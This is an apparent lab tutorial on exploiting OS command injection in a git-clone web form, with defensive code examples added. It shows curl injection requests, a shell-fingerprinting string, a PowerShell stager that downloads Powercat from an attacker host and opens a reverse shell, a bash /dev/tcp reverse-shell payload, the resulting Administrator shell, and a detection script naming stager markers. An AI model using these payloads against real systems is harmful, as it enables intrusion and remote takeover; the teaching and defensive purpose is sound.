Published on March 20, 2025
Web applications often interact with the operating system, for example during file uploads or when executing system commands. If a web application passes user input to the operating system without proper validation or sanitization, it may be vulnerable to **OS Command Injection**, which allows an attacker to execute arbitrary system commands on the host.
In this example, we examine a vulnerable web application, **Mountain Vaults**, running on http://192.168.50.189:8000. The application allows users to **clone git repositories**, and we suspect that we may be able to inject system commands.
The application allows users to enter a git clone command:
git clone https://github.com/offensive-security/exploitdb.git
After submitting the form, the repository is cloned successfully. However, the fact that the **exact command is displayed** in the output suggests that user input is being passed directly to the operating system.
We use **Burp Suite** to intercept the request and find that the vulnerable parameter is **Archive**. We attempt to inject a command using **curl**:
kali@kali:~$ curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive
However, the application detects the injection and rejects the input.
Since "git" is accepted as a valid command, we test whether an **additional command** can be appended after a `;` separator (URL-encoded as `%3B`):
kali@kali:~$ curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.50.189:8000/archive
The response includes **both git help output and the Windows IP configuration**, confirming that command injection is possible.
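To show why a `;` in the Archive value is enough, here is an added example (Python, not the Mountain Vaults application's own code): a handler that splices the user value into a shell command line, next to a hardened version that validates the value as a clone URL and runs git as an argument list with no shell. The host allowlist and the repository path pattern are assumptions made for the demonstration.

```python
"""Added example: vulnerable vs. hardened handling of a user-supplied clone URL.
This is illustrative code, not the code of the application discussed in the post."""
import re
import subprocess
from typing import List
from urllib.parse import urlsplit

# Hosts this service is allowed to clone from (constructed allowlist, an assumption).
ALLOWED_HOSTS = {"github.com", "gitlab.com"}
# Repository path: /owner/name or /owner/name.git, nothing else.
REPO_PATH_RE = re.compile(r"^/[A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+(\.git)?/?$")


def vulnerable_command(archive: str) -> str:
    # VULNERABLE: the user-controlled string becomes part of a shell command line,
    # so separators such as ';', '|' and '&' let the caller run extra commands.
    return f"git clone {archive}"


def validate_repo_url(archive: str) -> str:
    """Return the value unchanged if it is a plain https clone URL on an allowed
    host; raise ValueError for anything else (including shell metacharacters)."""
    parts = urlsplit(archive)
    if parts.scheme != "https":
        raise ValueError("only https clone URLs are accepted")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("host not in allowlist")
    if parts.username or parts.password or parts.port:
        raise ValueError("credentials and ports are not accepted")
    if parts.query or parts.fragment:
        raise ValueError("query strings and fragments are not accepted")
    if not REPO_PATH_RE.match(parts.path):
        raise ValueError("repository path contains unexpected characters")
    return archive


def safe_clone_argv(archive: str, dest: str = "repo") -> List[str]:
    """Build the argv list for git. Because no shell parses this list, a
    metacharacter in `archive` would reach git as literal text; the validator
    rejects it before that anyway. '--' stops git from reading a value that
    starts with '-' as an option."""
    url = validate_repo_url(archive)
    return ["git", "clone", "--", url, dest]


def safe_clone(archive: str, dest: str = "repo") -> subprocess.CompletedProcess:
    # shell=False (the default for a list argv) is what rules out command injection.
    return subprocess.run(safe_clone_argv(archive, dest),
                          capture_output=True, text=True, check=False)
```

The first function reproduces the mistake: `git;ipconfig` becomes the command line `git clone git;ipconfig`, which a shell splits at the `;`. The hardened path never hands the string to a shell, and validation is an allowlist of what a clone URL may look like rather than a blocklist of bad characters, so new separators or encodings do not need to be anticipated.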
To check whether injected commands are executed by **CMD** or **PowerShell**, we use this well-known detection snippet, which prints a different word depending on the interpreter that runs it:
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
kali@kali:~$ curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive
The output contains "PowerShell", confirming that injected commands run in a PowerShell environment.
We will use **Powercat**, a PowerShell implementation of Netcat, to establish a reverse shell. First we copy the script into the current directory, serve it over HTTP, and start a listener:
kali@kali:~$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
kali@kali:~$ python3 -m http.server 80
kali@kali:~$ nc -nvlp 4444
We now use **curl** to inject a command that downloads Powercat in memory and executes it, connecting back to our listener on port 4444.
kali@kali:~$ curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive
Linux payload equivalent (no Python web server is needed, only the netcat listener):
git%20|%20bash+-c+'bash+-i+>%26+/dev/tcp/192.168.45.183/4444+0>%261'
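From the defender's side, the probes and payloads above share a few recognisable traits once the parameter is URL-decoded. The following is an added example (Python, not part of the original post or the application) of a checker that could run over captured Archive values from a WAF, reverse proxy or application log; the sample values are constructed from the requests shown in this post, and the marker list is an assumption chosen for the demonstration.

```python
"""Added example: flag command-injection attempts in a submitted Archive value.
Illustrative detection logic, not the application's or any vendor's code."""
import re
from urllib.parse import unquote_plus

# Characters that end one command and start another in cmd.exe, PowerShell or sh.
SEPARATORS = re.compile(r"[;|&`\n$()]")

# Substrings that almost never occur in a legitimate clone URL but do occur in
# download-and-execute or reverse-shell stagers. Coarse by design: a hit is a
# reason to look, not proof on its own.
STAGER_MARKERS = [
    "iex", "invoke-expression", "downloadstring", "new-object",
    "/dev/tcp/", "bash -i", "powercat", "nc -e",
]


def normalise(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (covers double encoding and '+' as space),
    stopping as soon as another pass changes nothing."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_archive(raw: str) -> list:
    """Return the findings for one submitted value; an empty list means
    nothing suspicious was seen."""
    value = normalise(raw)
    lowered = value.lower()
    findings = []
    if SEPARATORS.search(value):
        findings.append("shell-separator")
    for marker in STAGER_MARKERS:
        if marker in lowered:
            findings.append("stager:" + marker)
    # A clone target should look like a URL; anything else deserves a look.
    if not lowered.startswith(("https://", "http://", "git@", "ssh://")):
        findings.append("not-a-url")
    return findings


# Constructed samples: the first is benign, the others mirror the post's probes.
SAMPLES = {
    "benign": "https%3A%2F%2Fgithub.com%2Foffensive-security%2Fexploitdb.git",
    "separator-probe": "git%3Bipconfig",
    "shell-fingerprint": "git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell",
    "ps-stager": "git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)",
    "bash-stager": "git%20|%20bash+-c+'bash+-i+>%26+/dev/tcp/192.168.45.183/4444+0>%261'",
}


def triage(samples: dict = SAMPLES) -> dict:
    """Map each sample label to its list of findings."""
    return {label: inspect_archive(raw) for label, raw in samples.items()}


if __name__ == "__main__":
    for label, findings in triage().items():
        print(f"{label:18} {findings or 'clean'}")
```

Decoding before matching matters: the raw requests in this post carry `%3B`, `%7C` and `+`, none of which match a naive search for `;`, `|` or spaces. The "not-a-url" check is the cheapest signal of all, since every probe above starts with a bare `git` rather than a repository URL.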
kali@kali:~$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.119.3] from (UNKNOWN) [192.168.50.189] 50325
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator\Documents\meteor>
We now have **full system access** as the **Administrator**!
This tutorial demonstrated how to exploit an **OS Command Injection vulnerability** in a web application. By identifying the vulnerable parameter, bypassing filters, and using a reverse shell, we gained full system access. Always validate and sanitize user input to prevent such attacks.